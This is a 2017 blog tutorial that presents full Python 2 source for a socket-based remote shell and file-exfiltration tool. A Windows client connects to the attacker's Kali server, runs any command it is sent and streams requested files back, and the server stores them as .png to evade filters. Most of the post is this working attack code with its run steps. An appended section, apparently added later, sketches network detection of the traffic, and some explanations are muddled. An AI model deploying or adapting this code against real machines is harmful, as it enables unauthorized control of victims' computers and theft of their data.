0P3N Blog Post

Python data_exfiltration with socket programming and network

By: HEGA GEOFFROY
December 19, 2017
Data exfiltration is the technique a hacker uses to transfer data from a victim's computer to the hacker's computer without authorization. The hacker uploads a malicious program to the remote computer; once the victim's computer is infected, the hacker takes control of it and starts exfiltrating data or files to his own computer. Another name for this kind of attack is data extrusion; both terms mean the same thing.

Socket programming is a process that runs between computers and is accomplished through communication; in general, Internet communication is the best way to do it. The process is implemented with an API (Application Programming Interface) that talks to the protocol stack. The protocol stack here is TCP/IP: the TCP and UDP protocols, combined with an IP address and a port, transfer information, packets and data across the network. This transfer of information in the network is controlled by subprocesses. But what are subprocesses? A subprocess, in simple terms, is the technique used to take control of another process: to hijack another process, spawn another process, or redirect one process into another.
Now I want to explain how to program data exfiltration with socket programming and networking in the Python language.

The first computer is server A >> Kali Linux. Configure its interface:

root# ifconfig eth0 192.168.1.15 netmask 255.255.255.0 up

data_exfiltration_server.py

```python
#!/usr/bin/env python
# Python 2 script (print statements, raw_input), as in the original post.
import socket
import sys
import os

if len(sys.argv) <= 2:
    print "Usage python data_exfiltration_server.py <host> <port>"
    exit()

def transfer(conn, command):
    # Forward the "grab*<path>" command, then write whatever the client
    # streams back into a file that is deliberately named .png.
    conn.send(command)
    file_object = open("/home/videos/test.png", "wb")
    while True:
        bits = conn.recv(1024)
        # Must match the exact string the client sends (the original
        # compared against 'Unable to find the file', which never matched).
        if 'Unable to find file' in bits:
            print '[-] Unable to find file'
            break
        if bits.endswith('DONE'):
            # 'DONE' is the client's end-of-file marker.
            print '[+] Transfer Completed'
            file_object.close()
            break
        file_object.write(bits)

def connect_server():
    host = sys.argv[1]
    port = int(sys.argv[2])
    socket_object = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    socket_object.bind((host, port))
    socket_object.listen(1)
    print '[+] Listening for incomming connection'
    conn, addr = socket_object.accept()
    print '[+] we got a connection from:', addr
    while True:
        command = raw_input("shell>")
        if 'terminate' in command:
            conn.send('terminate')
            conn.close()
            break
        elif 'grab' in command:
            transfer(conn, command)
        else:
            # Any other text is sent to the client as a shell command and
            # the first 1024 bytes of its output are printed.
            conn.send(command)
            print conn.recv(1024)

connect_server()
```

Explanation of the code:

import sys >> library for the usage message
import socket >> library for the socket functions
import os >> controls the whole system
def transfer(conn, command) >> function that transfers the file and receives it in .png format on the remote computer; after renaming the file back to its real format, this technique lets the hacker easily bypass the filter
host >> address of the server
port >> port of the server
socket.socket() >> function to connect to the network API
bind() >> binds the server to this address and port so the client can connect to it
listen() >> waits for the incoming connection from the client
accept() >> accepts the incoming connection from the client
raw_input() >> opens the shell once the connection with the client is established
grab >> command to transfer any file to the server
send() >> function used to send the command
recv() >> function used to receive the data that is transferred

Execute the code:

python data_exfiltration_server.py 192.168.1.15 8080
[+] Listening for incomming connection

Client B >> Windows 7, with its interface configured as 192.168.1.12/24.

data_exfiltration_client.py

```python
#!/usr/bin/env python
# Python 2 script, as in the original post.
import os
import socket
import subprocess

def transfer(socket_object, path):
    # Stream the requested file in 1024-byte chunks, then send the
    # 'DONE' marker the server waits for.
    if os.path.exists(path):
        file_object = open(path, "rb")
        contents = file_object.read(1024)
        while contents != '':
            socket_object.send(contents)
            contents = file_object.read(1024)
        socket_object.send('DONE')
        file_object.close()
    else:
        socket_object.send('Unable to find file')

def connect_client():
    socket_object = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    socket_object.connect(('192.168.1.15', 8080))
    while True:
        command = socket_object.recv(1024)
        if 'terminate' in command:
            socket_object.close()   # original had a typo: sock_object
            break
        elif 'grab' in command:
            # Command format is "grab*<path>".
            grab, path = command.split('*')
            try:
                transfer(socket_object, path)
            except Exception, e:
                socket_object.send(str(e))
                pass
        else:
            # Run anything else through the system shell and return
            # stdout followed by stderr.
            cmd = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            socket_object.send(cmd.stdout.read())
            socket_object.send(cmd.stderr.read())

def main():
    connect_client()

main()
```

Code explanation:

import os >> os for the system
import subprocess >> library for the subprocess functions
import socket >> library for the socket API on the network
def transfer(socket_object, path) >> this is the function that transfers the data from the client to the server: it reads the content and sends it to the server, a powerful function
socket.socket() >> socket function
connect() >> connects to the server
subprocess.Popen() >> opens the shell for the server
grab >> command to grab the data and transfer the file to the server

Connect the client to the server:

python data_exfiltration_client.py 192.168.1.15 8080

Then on the server the shell is open, and you grab a file to transfer the data from the remote computer:

shell> grab*file.exe

Example:
If the client computer is Windows 7, file.exe is transferred to the server and executed there. These two programs are meant to run on two different operating systems: server A is Kali Linux and client B is Windows 7.
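To show what a network defender can look for, here is an added example (not code from the original post) that walks a constructed capture of the payloads these two scripts exchange and flags the cleartext `grab*<path>` request and the `DONE` trailer; it also tests the post's .png trick against the PNG magic bytes, since a filter that inspects content is not fooled by an extension rename. The direction labels, the sample session and the function names are my own assumptions.

```python
import re

# Constructed for this example: wire format of the post's scripts, i.e. a
# cleartext "grab*<path>" request and a "DONE" trailer after the file bytes.
GRAB_RE = re.compile(rb"^grab\*(?P<path>.+)$", re.S)
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

def analyse_session(payloads):
    """Return detection findings for one TCP session.
    payloads: list of (direction, data); direction is 'c2->victim' or
    'victim->c2' (labels chosen for this example, not part of the post)."""
    findings, pending_path, collected = [], None, b""
    for direction, data in payloads:
        if direction == "c2->victim":
            m = GRAB_RE.match(data)
            if m:
                pending_path = m.group("path").decode(errors="replace")
                collected = b""
                findings.append("cleartext file request for %r" % pending_path)
            elif data != b"terminate":
                findings.append("cleartext shell command %r" % data.decode(errors="replace"))
        elif pending_path is not None:
            collected += data
            if collected.endswith(b"DONE"):  # the scripts' end-of-file marker
                findings.append("%d bytes of %r exfiltrated" % (len(collected) - 4, pending_path))
                pending_path = None
    return findings

def extension_matches_content(filename, data):
    """The post saves transfers as .png to slip past filters; a content-aware
    filter compares the magic bytes with the claimed extension instead."""
    if filename.lower().endswith(".png"):
        return data.startswith(PNG_MAGIC)
    return True  # only PNG is modelled in this example

# Constructed sample session (not a real capture): one command, one transfer.
SAMPLE_SESSION = [
    ("c2->victim", b"whoami"),
    ("victim->c2", b"win7-pc\\user\r\n"),
    ("c2->victim", b"grab*C:\\Users\\user\\secret.docx"),
    ("victim->c2", b"PK\x03\x04" + b"A" * 40),   # docx/zip header, then filler
    ("victim->c2", b"DONE"),
    ("c2->victim", b"terminate"),
]

if __name__ == "__main__":
    for finding in analyse_session(SAMPLE_SESSION):
        print("[!]", finding)
    print("real PNG:", extension_matches_content("test.png", b"PK\x03\x04"))
```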
